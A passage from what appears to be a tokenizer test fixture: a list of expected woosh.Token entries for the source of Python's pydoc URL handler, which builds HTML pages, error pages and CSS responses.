woosh.Token(woosh.OP, ')', 2630, 61, 2630, 62),
woosh.Token(woosh.OP, ',', 2630, 62, 2630, 63),
woosh.Token(woosh.NAME, 'exc', 2630, 64, 2630, 67),
woosh.Token(woosh.OP, ')', 2630, 67, 2630, 68),
woosh.Token(woosh.OP, ')', 2630, 68, 2630, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 2630, 69, 2631, 0),
woosh.Token(woosh.NAME, 'contents', 2631, 8, 2631, 16),
woosh.Token(woosh.OP, '=', 2631, 17, 2631, 18),
woosh.Token(woosh.NAME, 'heading', 2631, 19, 2631, 26),
woosh.Token(woosh.OP, '+', 2631, 27, 2631, 28),
woosh.Token(woosh.NAME, 'html', 2631, 29, 2631, 33),
woosh.Token(woosh.OP, '.', 2631, 33, 2631, 34),
woosh.Token(woosh.NAME, 'bigsection', 2631, 34, 2631, 44),
woosh.Token(woosh.OP, '(', 2631, 44, 2631, 45),
woosh.Token(woosh.NAME, 'url', 2631, 45, 2631, 48),
woosh.Token(woosh.OP, ',', 2631, 48, 2631, 49),
woosh.Token(woosh.STRING, "'#ffffff'", 2631, 50, 2631, 59),
woosh.Token(woosh.OP, ',', 2631, 59, 2631, 60),
woosh.Token(woosh.STRING, "'#bb0000'", 2631, 61, 2631, 70),
woosh.Token(woosh.OP, ',', 2631, 70, 2631, 71),
woosh.Token(woosh.NAME, 'contents', 2632, 45, 2632, 53),
woosh.Token(woosh.OP, ')', 2632, 53, 2632, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2632, 54, 2633, 0),
woosh.Token(woosh.NAME, 'return', 2633, 8, 2633, 14),
woosh.Token(woosh.STRING, '"Error - %s"', 2633, 15, 2633, 27),
woosh.Token(woosh.OP, '%', 2633, 28, 2633, 29),
woosh.Token(woosh.NAME, 'url', 2633, 30, 2633, 33),
woosh.Token(woosh.OP, ',', 2633, 33, 2633, 34),
woosh.Token(woosh.NAME, 'contents', 2633, 35, 2633, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2633, 43, 2634, 0),
woosh.Token(woosh.DEDENT, ' ', 2635, 0, 2635, 4),
woosh.Token(woosh.NAME, 'def', 2635, 4, 2635, 7),
woosh.Token(woosh.NAME, 'get_html_page', 2635, 8, 2635, 21),
woosh.Token(woosh.OP, '(', 2635, 21, 2635, 22),
woosh.Token(woosh.NAME, 'url', 2635, 22, 2635, 25),
woosh.Token(woosh.OP, ')', 2635, 25, 2635, 26),
woosh.Token(woosh.OP, ':', 2635, 26, 2635, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2635, 27, 2636, 0),
woosh.Token(woosh.INDENT, ' ', 2636, 0, 2636, 8),
woosh.Token(woosh.STRING, '"""Generate an HTML page for url."""', 2636, 8, 2636, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2636, 44, 2637, 0),
woosh.Token(woosh.NAME, 'complete_url', 2637, 8, 2637, 20),
woosh.Token(woosh.OP, '=', 2637, 21, 2637, 22),
woosh.Token(woosh.NAME, 'url', 2637, 23, 2637, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2637, 26, 2638, 0),
woosh.Token(woosh.NAME, 'if', 2638, 8, 2638, 10),
woosh.Token(woosh.NAME, 'url', 2638, 11, 2638, 14),
woosh.Token(woosh.OP, '.', 2638, 14, 2638, 15),
woosh.Token(woosh.NAME, 'endswith', 2638, 15, 2638, 23),
woosh.Token(woosh.OP, '(', 2638, 23, 2638, 24),
woosh.Token(woosh.STRING, "'.html'", 2638, 24, 2638, 31),
woosh.Token(woosh.OP, ')', 2638, 31, 2638, 32),
woosh.Token(woosh.OP, ':', 2638, 32, 2638, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2638, 33, 2639, 0),
woosh.Token(woosh.INDENT, ' ', 2639, 0, 2639, 12),
woosh.Token(woosh.NAME, 'url', 2639, 12, 2639, 15),
woosh.Token(woosh.OP, '=', 2639, 16, 2639, 17),
woosh.Token(woosh.NAME, 'url', 2639, 18, 2639, 21),
woosh.Token(woosh.OP, '[', 2639, 21, 2639, 22),
woosh.Token(woosh.OP, ':', 2639, 22, 2639, 23),
woosh.Token(woosh.OP, '-', 2639, 23, 2639, 24),
woosh.Token(woosh.NUMBER, '5', 2639, 24, 2639, 25),
woosh.Token(woosh.OP, ']', 2639, 25, 2639, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2639, 26, 2640, 0),
woosh.Token(woosh.DEDENT, ' ', 2640, 0, 2640, 8),
woosh.Token(woosh.NAME, 'try', 2640, 8, 2640, 11),
woosh.Token(woosh.OP, ':', 2640, 11, 2640, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2640, 12, 2641, 0),
woosh.Token(woosh.INDENT, ' ', 2641, 0, 2641, 12),
woosh.Token(woosh.NAME, 'if', 2641, 12, 2641, 14),
woosh.Token(woosh.NAME, 'url', 2641, 15, 2641, 18),
woosh.Token(woosh.NAME, 'in', 2641, 19, 2641, 21),
woosh.Token(woosh.OP, '(', 2641, 22, 2641, 23),
woosh.Token(woosh.STRING, '""', 2641, 23, 2641, 25),
woosh.Token(woosh.OP, ',', 2641, 25, 2641, 26),
woosh.Token(woosh.STRING, '"index"', 2641, 27, 2641, 34),
woosh.Token(woosh.OP, ')', 2641, 34, 2641, 35),
woosh.Token(woosh.OP, ':', 2641, 35, 2641, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2641, 36, 2642, 0),
woosh.Token(woosh.INDENT, ' ', 2642, 0, 2642, 16),
woosh.Token(woosh.NAME, 'title', 2642, 16, 2642, 21),
woosh.Token(woosh.OP, ',', 2642, 21, 2642, 22),
woosh.Token(woosh.NAME, 'content', 2642, 23, 2642, 30),
woosh.Token(woosh.OP, '=', 2642, 31, 2642, 32),
woosh.Token(woosh.NAME, 'html_index', 2642, 33, 2642, 43),
woosh.Token(woosh.OP, '(', 2642, 43, 2642, 44),
woosh.Token(woosh.OP, ')', 2642, 44, 2642, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2642, 45, 2643, 0),
woosh.Token(woosh.DEDENT, ' ', 2643, 0, 2643, 12),
woosh.Token(woosh.NAME, 'elif', 2643, 12, 2643, 16),
woosh.Token(woosh.NAME, 'url', 2643, 17, 2643, 20),
woosh.Token(woosh.OP, '==', 2643, 21, 2643, 23),
woosh.Token(woosh.STRING, '"topics"', 2643, 24, 2643, 32),
woosh.Token(woosh.OP, ':', 2643, 32, 2643, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2643, 33, 2644, 0),
woosh.Token(woosh.INDENT, ' ', 2644, 0, 2644, 16),
woosh.Token(woosh.NAME, 'title', 2644, 16, 2644, 21),
woosh.Token(woosh.OP, ',', 2644, 21, 2644, 22),
woosh.Token(woosh.NAME, 'content', 2644, 23, 2644, 30),
woosh.Token(woosh.OP, '=', 2644, 31, 2644, 32),
woosh.Token(woosh.NAME, 'html_topics', 2644, 33, 2644, 44),
woosh.Token(woosh.OP, '(', 2644, 44, 2644, 45),
woosh.Token(woosh.OP, ')', 2644, 45, 2644, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2644, 46, 2645, 0),
woosh.Token(woosh.DEDENT, ' ', 2645, 0, 2645, 12),
woosh.Token(woosh.NAME, 'elif', 2645, 12, 2645, 16),
woosh.Token(woosh.NAME, 'url', 2645, 17, 2645, 20),
woosh.Token(woosh.OP, '==', 2645, 21, 2645, 23),
woosh.Token(woosh.STRING, '"keywords"', 2645, 24, 2645, 34),
woosh.Token(woosh.OP, ':', 2645, 34, 2645, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2645, 35, 2646, 0),
woosh.Token(woosh.INDENT, ' ', 2646, 0, 2646, 16),
woosh.Token(woosh.NAME, 'title', 2646, 16, 2646, 21),
woosh.Token(woosh.OP, ',', 2646, 21, 2646, 22),
woosh.Token(woosh.NAME, 'content', 2646, 23, 2646, 30),
woosh.Token(woosh.OP, '=', 2646, 31, 2646, 32),
woosh.Token(woosh.NAME, 'html_keywords', 2646, 33, 2646, 46),
woosh.Token(woosh.OP, '(', 2646, 46, 2646, 47),
woosh.Token(woosh.OP, ')', 2646, 47, 2646, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 2646, 48, 2647, 0),
woosh.Token(woosh.DEDENT, ' ', 2647, 0, 2647, 12),
woosh.Token(woosh.NAME, 'elif', 2647, 12, 2647, 16),
woosh.Token(woosh.STRING, "'='", 2647, 17, 2647, 20),
woosh.Token(woosh.NAME, 'in', 2647, 21, 2647, 23),
woosh.Token(woosh.NAME, 'url', 2647, 24, 2647, 27),
woosh.Token(woosh.OP, ':', 2647, 27, 2647, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2647, 28, 2648, 0),
woosh.Token(woosh.INDENT, ' ', 2648, 0, 2648, 16),
woosh.Token(woosh.NAME, 'op', 2648, 16, 2648, 18),
woosh.Token(woosh.OP, ',', 2648, 18, 2648, 19),
woosh.Token(woosh.NAME, '_', 2648, 20, 2648, 21),
woosh.Token(woosh.OP, ',', 2648, 21, 2648, 22),
woosh.Token(woosh.NAME, 'url', 2648, 23, 2648, 26),
woosh.Token(woosh.OP, '=', 2648, 27, 2648, 28),
woosh.Token(woosh.NAME, 'url', 2648, 29, 2648, 32),
woosh.Token(woosh.OP, '.', 2648, 32, 2648, 33),
woosh.Token(woosh.NAME, 'partition', 2648, 33, 2648, 42),
woosh.Token(woosh.OP, '(', 2648, 42, 2648, 43),
woosh.Token(woosh.STRING, "'='", 2648, 43, 2648, 46),
woosh.Token(woosh.OP, ')', 2648, 46, 2648, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2648, 47, 2649, 0),
woosh.Token(woosh.NAME, 'if', 2649, 16, 2649, 18),
woosh.Token(woosh.NAME, 'op', 2649, 19, 2649, 21),
woosh.Token(woosh.OP, '==', 2649, 22, 2649, 24),
woosh.Token(woosh.STRING, '"search?key"', 2649, 25, 2649, 37),
woosh.Token(woosh.OP, ':', 2649, 37, 2649, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2649, 38, 2650, 0),
woosh.Token(woosh.INDENT, ' ', 2650, 0, 2650, 20),
woosh.Token(woosh.NAME, 'title', 2650, 20, 2650, 25),
woosh.Token(woosh.OP, ',', 2650, 25, 2650, 26),
woosh.Token(woosh.NAME, 'content', 2650, 27, 2650, 34),
woosh.Token(woosh.OP, '=', 2650, 35, 2650, 36),
woosh.Token(woosh.NAME, 'html_search', 2650, 37, 2650, 48),
woosh.Token(woosh.OP, '(', 2650, 48, 2650, 49),
woosh.Token(woosh.NAME, 'url', 2650, 49, 2650, 52),
woosh.Token(woosh.OP, ')', 2650, 52, 2650, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2650, 53, 2651, 0),
woosh.Token(woosh.DEDENT, ' ', 2651, 0, 2651, 16),
woosh.Token(woosh.NAME, 'elif', 2651, 16, 2651, 20),
woosh.Token(woosh.NAME, 'op', 2651, 21, 2651, 23),
woosh.Token(woosh.OP, '==', 2651, 24, 2651, 26),
woosh.Token(woosh.STRING, '"getfile?key"', 2651, 27, 2651, 40),
woosh.Token(woosh.OP, ':', 2651, 40, 2651, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2651, 41, 2652, 0),
woosh.Token(woosh.INDENT, ' ', 2652, 0, 2652, 20),
woosh.Token(woosh.NAME, 'title', 2652, 20, 2652, 25),
woosh.Token(woosh.OP, ',', 2652, 25, 2652, 26),
woosh.Token(woosh.NAME, 'content', 2652, 27, 2652, 34),
woosh.Token(woosh.OP, '=', 2652, 35, 2652, 36),
woosh.Token(woosh.NAME, 'html_getfile', 2652, 37, 2652, 49),
woosh.Token(woosh.OP, '(', 2652, 49, 2652, 50),
woosh.Token(woosh.NAME, 'url', 2652, 50, 2652, 53),
woosh.Token(woosh.OP, ')', 2652, 53, 2652, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2652, 54, 2653, 0),
woosh.Token(woosh.DEDENT, ' ', 2653, 0, 2653, 16),
woosh.Token(woosh.NAME, 'elif', 2653, 16, 2653, 20),
woosh.Token(woosh.NAME, 'op', 2653, 21, 2653, 23),
woosh.Token(woosh.OP, '==', 2653, 24, 2653, 26),
woosh.Token(woosh.STRING, '"topic?key"', 2653, 27, 2653, 38),
woosh.Token(woosh.OP, ':', 2653, 38, 2653, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2653, 39, 2654, 0),
woosh.Token(woosh.COMMENT, '# try topics first, then objects.', 2654, 20, 2654, 53),
woosh.Token(woosh.INDENT, ' ', 2655, 0, 2655, 20),
woosh.Token(woosh.NAME, 'try', 2655, 20, 2655, 23),
woosh.Token(woosh.OP, ':', 2655, 23, 2655, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2655, 24, 2656, 0),
woosh.Token(woosh.INDENT, ' ', 2656, 0, 2656, 24),
woosh.Token(woosh.NAME, 'title', 2656, 24, 2656, 29),
woosh.Token(woosh.OP, ',', 2656, 29, 2656, 30),
woosh.Token(woosh.NAME, 'content', 2656, 31, 2656, 38),
woosh.Token(woosh.OP, '=', 2656, 39, 2656, 40),
woosh.Token(woosh.NAME, 'html_topicpage', 2656, 41, 2656, 55),
woosh.Token(woosh.OP, '(', 2656, 55, 2656, 56),
woosh.Token(woosh.NAME, 'url', 2656, 56, 2656, 59),
woosh.Token(woosh.OP, ')', 2656, 59, 2656, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2656, 60, 2657, 0),
woosh.Token(woosh.DEDENT, ' ', 2657, 0, 2657, 20),
woosh.Token(woosh.NAME, 'except', 2657, 20, 2657, 26),
woosh.Token(woosh.NAME, 'ValueError', 2657, 27, 2657, 37),
woosh.Token(woosh.OP, ':', 2657, 37, 2657, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2657, 38, 2658, 0),
woosh.Token(woosh.INDENT, ' ', 2658, 0, 2658, 24),
woosh.Token(woosh.NAME, 'title', 2658, 24, 2658, 29),
woosh.Token(woosh.OP, ',', 2658, 29, 2658, 30),
woosh.Token(woosh.NAME, 'content', 2658, 31, 2658, 38),
woosh.Token(woosh.OP, '=', 2658, 39, 2658, 40),
woosh.Token(woosh.NAME, 'html_getobj', 2658, 41, 2658, 52),
woosh.Token(woosh.OP, '(', 2658, 52, 2658, 53),
woosh.Token(woosh.NAME, 'url', 2658, 53, 2658, 56),
woosh.Token(woosh.OP, ')', 2658, 56, 2658, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2658, 57, 2659, 0),
woosh.Token(woosh.DEDENT, ' ', 2659, 0, 2659, 16),
woosh.Token(woosh.DEDENT, '', 2659, 16, 2659, 16),
woosh.Token(woosh.NAME, 'elif', 2659, 16, 2659, 20),
woosh.Token(woosh.NAME, 'op', 2659, 21, 2659, 23),
woosh.Token(woosh.OP, '==', 2659, 24, 2659, 26),
woosh.Token(woosh.STRING, '"get?key"', 2659, 27, 2659, 36),
woosh.Token(woosh.OP, ':', 2659, 36, 2659, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2659, 37, 2660, 0),
woosh.Token(woosh.COMMENT, '# try objects first, then topics.', 2660, 20, 2660, 53),
woosh.Token(woosh.INDENT, ' ', 2661, 0, 2661, 20),
woosh.Token(woosh.NAME, 'if', 2661, 20, 2661, 22),
woosh.Token(woosh.NAME, 'url', 2661, 23, 2661, 26),
woosh.Token(woosh.NAME, 'in', 2661, 27, 2661, 29),
woosh.Token(woosh.OP, '(', 2661, 30, 2661, 31),
woosh.Token(woosh.STRING, '""', 2661, 31, 2661, 33),
woosh.Token(woosh.OP, ',', 2661, 33, 2661, 34),
woosh.Token(woosh.STRING, '"index"', 2661, 35, 2661, 42),
woosh.Token(woosh.OP, ')', 2661, 42, 2661, 43),
woosh.Token(woosh.OP, ':', 2661, 43, 2661, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2661, 44, 2662, 0),
woosh.Token(woosh.INDENT, ' ', 2662, 0, 2662, 24),
woosh.Token(woosh.NAME, 'title', 2662, 24, 2662, 29),
woosh.Token(woosh.OP, ',', 2662, 29, 2662, 30),
woosh.Token(woosh.NAME, 'content', 2662, 31, 2662, 38),
woosh.Token(woosh.OP, '=', 2662, 39, 2662, 40),
woosh.Token(woosh.NAME, 'html_index', 2662, 41, 2662, 51),
woosh.Token(woosh.OP, '(', 2662, 51, 2662, 52),
woosh.Token(woosh.OP, ')', 2662, 52, 2662, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2662, 53, 2663, 0),
woosh.Token(woosh.DEDENT, ' ', 2663, 0, 2663, 20),
woosh.Token(woosh.NAME, 'else', 2663, 20, 2663, 24),
woosh.Token(woosh.OP, ':', 2663, 24, 2663, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2663, 25, 2664, 0),
woosh.Token(woosh.INDENT, ' ', 2664, 0, 2664, 24),
woosh.Token(woosh.NAME, 'try', 2664, 24, 2664, 27),
woosh.Token(woosh.OP, ':', 2664, 27, 2664, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2664, 28, 2665, 0),
woosh.Token(woosh.INDENT, ' ', 2665, 0, 2665, 28),
woosh.Token(woosh.NAME, 'title', 2665, 28, 2665, 33),
woosh.Token(woosh.OP, ',', 2665, 33, 2665, 34),
woosh.Token(woosh.NAME, 'content', 2665, 35, 2665, 42),
woosh.Token(woosh.OP, '=', 2665, 43, 2665, 44),
woosh.Token(woosh.NAME, 'html_getobj', 2665, 45, 2665, 56),
woosh.Token(woosh.OP, '(', 2665, 56, 2665, 57),
woosh.Token(woosh.NAME, 'url', 2665, 57, 2665, 60),
woosh.Token(woosh.OP, ')', 2665, 60, 2665, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 2665, 61, 2666, 0),
woosh.Token(woosh.DEDENT, ' ', 2666, 0, 2666, 24),
woosh.Token(woosh.NAME, 'except', 2666, 24, 2666, 30),
woosh.Token(woosh.NAME, 'ValueError', 2666, 31, 2666, 41),
woosh.Token(woosh.OP, ':', 2666, 41, 2666, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2666, 42, 2667, 0),
woosh.Token(woosh.INDENT, ' ', 2667, 0, 2667, 28),
woosh.Token(woosh.NAME, 'title', 2667, 28, 2667, 33),
woosh.Token(woosh.OP, ',', 2667, 33, 2667, 34),
woosh.Token(woosh.NAME, 'content', 2667, 35, 2667, 42),
woosh.Token(woosh.OP, '=', 2667, 43, 2667, 44),
woosh.Token(woosh.NAME, 'html_topicpage', 2667, 45, 2667, 59),
woosh.Token(woosh.OP, '(', 2667, 59, 2667, 60),
woosh.Token(woosh.NAME, 'url', 2667, 60, 2667, 63),
woosh.Token(woosh.OP, ')', 2667, 63, 2667, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2667, 64, 2668, 0),
woosh.Token(woosh.DEDENT, ' ', 2668, 0, 2668, 16),
woosh.Token(woosh.DEDENT, '', 2668, 16, 2668, 16),
woosh.Token(woosh.DEDENT, '', 2668, 16, 2668, 16),
woosh.Token(woosh.NAME, 'else', 2668, 16, 2668, 20),
woosh.Token(woosh.OP, ':', 2668, 20, 2668, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2668, 21, 2669, 0),
woosh.Token(woosh.INDENT, ' ', 2669, 0, 2669, 20),
woosh.Token(woosh.NAME, 'raise', 2669, 20, 2669, 25),
woosh.Token(woosh.NAME, 'ValueError', 2669, 26, 2669, 36),
woosh.Token(woosh.OP, '(', 2669, 36, 2669, 37),
woosh.Token(woosh.STRING, "'bad pydoc url'", 2669, 37, 2669, 52),
woosh.Token(woosh.OP, ')', 2669, 52, 2669, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2669, 53, 2670, 0),
woosh.Token(woosh.DEDENT, ' ', 2670, 0, 2670, 12),
woosh.Token(woosh.DEDENT, '', 2670, 12, 2670, 12),
woosh.Token(woosh.NAME, 'else', 2670, 12, 2670, 16),
woosh.Token(woosh.OP, ':', 2670, 16, 2670, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2670, 17, 2671, 0),
woosh.Token(woosh.INDENT, ' ', 2671, 0, 2671, 16),
woosh.Token(woosh.NAME, 'title', 2671, 16, 2671, 21),
woosh.Token(woosh.OP, ',', 2671, 21, 2671, 22),
woosh.Token(woosh.NAME, 'content', 2671, 23, 2671, 30),
woosh.Token(woosh.OP, '=', 2671, 31, 2671, 32),
woosh.Token(woosh.NAME, 'html_getobj', 2671, 33, 2671, 44),
woosh.Token(woosh.OP, '(', 2671, 44, 2671, 45),
woosh.Token(woosh.NAME, 'url', 2671, 45, 2671, 48),
woosh.Token(woosh.OP, ')', 2671, 48, 2671, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2671, 49, 2672, 0),
woosh.Token(woosh.DEDENT, ' ', 2672, 0, 2672, 8),
woosh.Token(woosh.DEDENT, '', 2672, 8, 2672, 8),
woosh.Token(woosh.NAME, 'except', 2672, 8, 2672, 14),
woosh.Token(woosh.NAME, 'Exception', 2672, 15, 2672, 24),
woosh.Token(woosh.NAME, 'as', 2672, 25, 2672, 27),
woosh.Token(woosh.NAME, 'exc', 2672, 28, 2672, 31),
woosh.Token(woosh.OP, ':', 2672, 31, 2672, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2672, 32, 2673, 0),
woosh.Token(woosh.COMMENT, '# Catch any errors and display them in an error page.', 2673, 12, 2673, 65),
woosh.Token(woosh.INDENT, ' ', 2674, 0, 2674, 12),
woosh.Token(woosh.NAME, 'title', 2674, 12, 2674, 17),
woosh.Token(woosh.OP, ',', 2674, 17, 2674, 18),
woosh.Token(woosh.NAME, 'content', 2674, 19, 2674, 26),
woosh.Token(woosh.OP, '=', 2674, 27, 2674, 28),
woosh.Token(woosh.NAME, 'html_error', 2674, 29, 2674, 39),
woosh.Token(woosh.OP, '(', 2674, 39, 2674, 40),
woosh.Token(woosh.NAME, 'complete_url', 2674, 40, 2674, 52),
woosh.Token(woosh.OP, ',', 2674, 52, 2674, 53),
woosh.Token(woosh.NAME, 'exc', 2674, 54, 2674, 57),
woosh.Token(woosh.OP, ')', 2674, 57, 2674, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2674, 58, 2675, 0),
woosh.Token(woosh.DEDENT, ' ', 2675, 0, 2675, 8),
woosh.Token(woosh.NAME, 'return', 2675, 8, 2675, 14),
woosh.Token(woosh.NAME, 'html', 2675, 15, 2675, 19),
woosh.Token(woosh.OP, '.', 2675, 19, 2675, 20),
woosh.Token(woosh.NAME, 'page', 2675, 20, 2675, 24),
woosh.Token(woosh.OP, '(', 2675, 24, 2675, 25),
woosh.Token(woosh.NAME, 'title', 2675, 25, 2675, 30),
woosh.Token(woosh.OP, ',', 2675, 30, 2675, 31),
woosh.Token(woosh.NAME, 'content', 2675, 32, 2675, 39),
woosh.Token(woosh.OP, ')', 2675, 39, 2675, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2675, 40, 2676, 0),
woosh.Token(woosh.DEDENT, ' ', 2677, 0, 2677, 4),
woosh.Token(woosh.NAME, 'if', 2677, 4, 2677, 6),
woosh.Token(woosh.NAME, 'url', 2677, 7, 2677, 10),
woosh.Token(woosh.OP, '.', 2677, 10, 2677, 11),
woosh.Token(woosh.NAME, 'startswith', 2677, 11, 2677, 21),
woosh.Token(woosh.OP, '(', 2677, 21, 2677, 22),
woosh.Token(woosh.STRING, "'/'", 2677, 22, 2677, 25),
woosh.Token(woosh.OP, ')', 2677, 25, 2677, 26),
woosh.Token(woosh.OP, ':', 2677, 26, 2677, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2677, 27, 2678, 0),
woosh.Token(woosh.INDENT, ' ', 2678, 0, 2678, 8),
woosh.Token(woosh.NAME, 'url', 2678, 8, 2678, 11),
woosh.Token(woosh.OP, '=', 2678, 12, 2678, 13),
woosh.Token(woosh.NAME, 'url', 2678, 14, 2678, 17),
woosh.Token(woosh.OP, '[', 2678, 17, 2678, 18),
woosh.Token(woosh.NUMBER, '1', 2678, 18, 2678, 19),
woosh.Token(woosh.OP, ':', 2678, 19, 2678, 20),
woosh.Token(woosh.OP, ']', 2678, 20, 2678, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2678, 21, 2679, 0),
woosh.Token(woosh.DEDENT, ' ', 2679, 0, 2679, 4),
woosh.Token(woosh.NAME, 'if', 2679, 4, 2679, 6),
woosh.Token(woosh.NAME, 'content_type', 2679, 7, 2679, 19),
woosh.Token(woosh.OP, '==', 2679, 20, 2679, 22),
woosh.Token(woosh.STRING, "'text/css'", 2679, 23, 2679, 33),
woosh.Token(woosh.OP, ':', 2679, 33, 2679, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2679, 34, 2680, 0),
woosh.Token(woosh.INDENT, ' ', 2680, 0, 2680, 8),
woosh.Token(woosh.NAME, 'path_here', 2680, 8, 2680, 17),
woosh.Token(woosh.OP, '=', 2680, 18, 2680, 19),
woosh.Token(woosh.NAME, 'os', 2680, 20, 2680, 22),
woosh.Token(woosh.OP, '.', 2680, 22, 2680, 23),
woosh.Token(woosh.NAME, 'path', 2680, 23, 2680, 27),
woosh.Token(woosh.OP, '.', 2680, 27, 2680, 28),
woosh.Token(woosh.NAME, 'dirname', 2680, 28, 2680, 35),
woosh.Token(woosh.OP, '(', 2680, 35, 2680, 36),
woosh.Token(woosh.NAME, 'os', 2680, 36, 2680, 38),
woosh.Token(woosh.OP, '.', 2680, 38, 2680, 39),
woosh.Token(woosh.NAME, 'path', 2680, 39, 2680, 43),
woosh.Token(woosh.OP, '.', 2680, 43, 2680, 44),
woosh.Token(woosh.NAME, 'realpath', 2680, 44, 2680, 52),
woosh.Token(woosh.OP, '(', 2680, 52, 2680, 53),
woosh.Token(woosh.NAME, '__file__', 2680, 53, 2680, 61),
woosh.Token(woosh.OP, ')', 2680, 61, 2680, 62),
woosh.Token(woosh.OP, ')', 2680, 62, 2680, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2680, 63, 2681, 0),
woosh.Token(woosh.NAME, 'css_path', 2681, 8, 2681, 16),
woosh.Token(woosh.OP, '=', 2681, 17, 2681, 18),
woosh.Token(woosh.NAME, 'os', 2681, 19, 2681, 21),
woosh.Token(woosh.OP, '.', 2681, 21, 2681, 22),
woosh.Token(woosh.NAME, 'path', 2681, 22, 2681, 26),
woosh.Token(woosh.OP, '.', 2681, 26, 2681, 27),
woosh.Token(woosh.NAME, 'join', 2681, 27, 2681, 31),
woosh.Token(woosh.OP, '(', 2681, 31, 2681, 32),
woosh.Token(woosh.NAME, 'path_here', 2681, 32, 2681, 41),
woosh.Token(woosh.OP, ',', 2681, 41, 2681, 42),
woosh.Token(woosh.NAME, 'url', 2681, 43, 2681, 46),
woosh.Token(woosh.OP, ')', 2681, 46, 2681, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2681, 47, 2682, 0),
woosh.Token(woosh.NAME, 'with', 2682, 8, 2682, 12),
woosh.Token(woosh.NAME, 'open', 2682, 13, 2682, 17),
woosh.Token(woosh.OP, '(', 2682, 17, 2682, 18),
woosh.Token(woosh.NAME, 'css_path', 2682, 18, 2682, 26),
woosh.Token(woosh.OP, ')', 2682, 26, 2682, 27),
woosh.Token(woosh.NAME, 'as', 2682, 28, 2682, 30),
woosh.Token(woosh.NAME, 'fp', 2682, 31, 2682, 33),
woosh.Token(woosh.OP, ':', 2682, 33, 2682, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2682, 34, 2683, 0),
woosh.Token(woosh.INDENT, ' ', 2683, 0, 2683, 12),
woosh.Token(woosh.NAME, 'return', 2683, 12, 2683, 18),
woosh.Token(woosh.STRING, "''", 2683, 19, 2683, 21),
woosh.Token(woosh.OP, '.', 2683, 21, 2683, 22),
woosh.Token(woosh.NAME, 'join', 2683, 22, 2683, 26),
woosh.Token(woosh.OP, '(', 2683, 26, 2683, 27),
woosh.Token(woosh.NAME, 'fp', 2683, 27, 2683, 29),
woosh.Token(woosh.OP, '.', 2683, 29, 2683, 30),
woosh.Token(woosh.NAME, 'readlines', 2683, 30, 2683, 39),
woosh.Token(woosh.OP, '(', 2683, 39, 2683, 40),
woosh.Token(woosh.OP, ')', 2683, 40, 2683, 41),
woosh.Token(woosh.OP, ')', 2683, 41, 2683, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2683, 42, 2684, 0),
woosh.Token(woosh.DEDENT, ' ', 2684, 0, 2684, 4),
woosh.Token(woosh.DEDENT, '', 2684, 4, 2684, 4),
woosh.Token(woosh.NAME, 'elif', 2684, 4, 2684, 8),
woosh.Token(woosh.NAME, 'content_type', 2684, 9, 2684, 21),
woosh.Token(woosh.OP, '==', 2684, 22, 2684, 24),
woosh.Token(woosh.STRING, "'text/html'", 2684, 25, 2684, 36),
woosh.Token(woosh.OP, ':', 2684, 36, 2684, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2684, 37, 2685, 0),
woosh.Token(woosh.INDENT, ' ', 2685, 0, 2685, 8),
woosh.Token(woosh.NAME, 'return', 2685, 8, 2685, 14),
woosh.Token(woosh.NAME, 'get_html_page', 2685, 15, 2685, 28),
woosh.Token(woosh.OP, '(', 2685, 28, 2685, 29),
woosh.Token(woosh.NAME, 'url', 2685, 29, 2685, 32),
woosh.Token(woosh.OP, ')', 2685, 32, 2685, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2685, 33, 2686, 0),
woosh.Token(woosh.COMMENT, '# Errors outside the url handler are caught by the server.', 2686, 4, 2686, 62),
woosh.Token(woosh.DEDENT, ' ', 2687, 0, 2687, 4),
woosh.Token(woosh.NAME, 'raise', 2687, 4, 2687, 9),
woosh.Token(woosh.NAME, 'TypeError', 2687, 10, 2687, 19),
woosh.Token(woosh.OP, '(', 2687, 19, 2687, 20),
woosh.Token(woosh.STRING, "'unknown content type %r for url %s'", 2687, 20, 2687, 56),
